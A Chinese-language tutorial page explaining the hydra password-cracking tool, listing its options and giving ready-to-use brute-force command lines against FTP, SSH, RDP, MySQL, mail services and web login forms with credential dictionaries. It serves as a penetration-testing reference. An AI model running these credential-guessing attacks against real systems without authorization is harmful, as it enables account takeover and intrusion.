[系统运维] hydra使用指南

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> 系统运维 -> hydra使用指南 -> 正文阅读

[系统运维]hydra使用指南

-R ? 恢复先前中止/崩溃的会话
-L ?指定用户名字典
-S ? 执行SSL连接
-s ? 如果服务位于不同的默认端口上，请在此处定义它，指定非默认端口
-l ? 使用登录名登录，或从文件加载多个登录名，指定破解的用户，对特定用户破解
-p ?使用密码登录，或从文件加载多个密码
-P ?指定密码字典
-x ?密码暴力生成，键入“-x-h”获取帮助
-e ?尝试“n”空密码，空密码试探，“s”登录通过and/or ，使用指定用户和密码试探“r”反向登录
-u 循环访问用户，而不是密码（有效！暗含-x）
-C ?冒号分隔的“login:pass”格式，而不是-L/-P选项
-M ?要攻击的服务器列表，每行一个条目，“：”指定端口
-o ?将找到的登录/密码对写入文件而不是stdout，指定结果输出文件
-f / -F 当发现登录/通行证对时退出（每个主机，- f全局）在使用-M参数以后，找到第一对登录名或者密码时中止破解
-t 并行运行任务连接数（每个主机，默认值：16）
-w / -W ?每个线程的连接之间的响应等待时间（32s）?
-4 / -6 prefer IPv4 (default) or IPv6 addresses
-v / -V / -d ?详细模式/每次尝试显示登录+通过/调试模式?
-q ?不打印有关连接错误的消息?
-U ?服务模块使用详细信息
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option) 目标：DNS、IP或192.168.0.0/24（这个或-M选项）
service the service to crack (see below for supported protocols) 要破解的服务（有关支持的协议）?
OPT some service modules support additional input (-U for module help) 一些服务模块支持附加输入（模块帮助为-U）
server 目标ip
service 指定服务名，支持的服务和协议

hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh

hydra -M target.txt rdp -L userlist.txt -P passwordlist.txt -V
-M是目标列表，-L是用户名，-P是密码，rdp是远程桌面服务，-V是列出详细进度
元素
-l表示一个用户名（使用-L表示用户名列表）
-P表示使用以下密码列表
http-post-form指示表单的类型
/ hydra / login-php是登录页面URL
username是在其中输入用户名的表单字段
^ USER ^告诉Hydra使用用户名或字段中的列表
password是在其中输入密码的表单字段（可以是passwd，pass等）。
^ PASS ^告诉Hydra使用提供的密码列表
Login 指示Hydra登录失败消息
Login failed是表单返回的登录失败消息
-V用于显示每次尝试的详细输出

爆破apl接口或表单
hydra -L ./常用用户名.txt -p 111111 -o ok.lst -t 5 -V -f 1.1.1.1 http-post-form "/login:teaId=^USER^&teaPwd=^PASS^&requestType=json:用户不存在"
hydra -l 20060138 ?-P ./渗透字典.txt ?-o ok.lst -t 5 -V -f 2.2.2.2 http-post -form"/login:teaId=^USER^&teaPwd=^PASS^&requestType=json:密码不正确"

爆破ssh服务
hydra -l root -P ./常用密码.txt -t 4 ssh://3.3.3.3
hydra -l 用户名 -P 密码字典 -t 线程 -vV -e nsr ip ssh hydra -l 用户名 -P 密码字典 -t 线程 -o save.log -vV ip ssh ? ? 破解ssh密码

爆破数据库
数据库一般会提供一个默认的帐户，MySQL的root用户，Oracle的System用户。?
破解mysql数据库 hydra -L user.txt -P pass.txt ip mysql hydra -L user.txt -P pass.txt mysql://目标IP:mysql端口号

post方式提交破解web登录
?hydra -l admin -P small.txt 域名/ip -s 端口 http-post-form "/Pass-09/index.php:username=^USER^&password=^PASS^&Login=Login:F=密码错误" -v

破解ftp
?hydra ip ftp -l 用户名 -P 密码字典 -t 线程数(默认16) –vV 如果你发现目标ftp并不是在21端口，而是在其他端口上，可以使用-s参数指定正确的端口，其他服务同样。
?